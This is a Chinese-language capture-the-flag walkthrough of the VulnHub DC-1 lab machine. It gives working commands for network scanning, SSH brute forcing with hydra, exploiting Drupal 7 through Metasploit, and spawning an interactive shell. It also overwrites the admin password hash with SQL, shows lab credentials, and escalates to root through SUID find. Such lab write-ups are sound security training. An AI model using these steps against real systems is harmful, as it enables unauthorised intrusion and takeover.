vulnub-dc-1

靶机地址: https://www.vulnhub.com/entry/dc-1,292/.

知识点

nmap

用nmap扫描局域网内存活的主机,发现靶机的ip

nmap 192.168.88.0/24 -T4


用nmap进行更加详细的扫描,发现靶机开了以下的几个端口)

nmap 192.168.88.137 -T4 -A -sV -p-

durpalCMS

端口:22 ——>爆破 ——>未成功

hydra -l root -P rockyou.txt 192.168.88.137 ssh


端口:80 ——>web漏洞——>成功

指纹识别,是drupal 7

)

扫描目录,得到后台地址和robots.txt文件,但爆破后台失败,发现无可利用的点。

./dirsearch.py --url http://192.168.88.137 -e php

Metasploit

把思路转向Metasploit,在kali中寻找该CMS的版本漏洞,因exp太多,不知道该用哪一个所以在msf中查找一下,把范围缩小

searchsploit drupal 7

search drupal

在这里我们用第四个exp,成功拿到shell(一个一个试)

)

shell
python -c "import pty;pty.spawn('/bin/bash')"

得到一个交互式的shell,在www目录下找到第一个flag,也提示了下一个flag和配置文件有关

百度可知drupal的数据库配置文件路径,也在数据库配置文件中拿到了第二个flag和一对帐号密码
dbuser:R0ck3t

百度可知drupal的数据库配置文件路径

数据库改密

用已知的数据库帐号密码进行登录,修改网站管理员的密码,达到登录后台的方法。
drupal的hash加密方法参考以下链接: drupalchina.cn/node/2128.

password: password hash:

update users set update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'  where name='admin';

用admin:password登录后台,在content左下角发现第三个flag

根据提示查看当前主机的用户,发现只有一个用户flag4,试着爆破一下,发现爆破成功。
用户名密码lag4:orange。登录到主机发现第四个flag,通过第四个flag知道最后一个flag在root目录下,也就是要拿到root权限。

))

suid之find提权

寻找可提权的信息,没有sudo也没有定时任务,但找到了find的suid权限,可通过find提权至root。

find / -type f -perm -u=s 2>/dev/null

touch 1
find 1 -exec "/bin/sh" \; 

至此五个flag已经全部拿到。


  转载请注明: XingHe vulnub-dc-1

  目录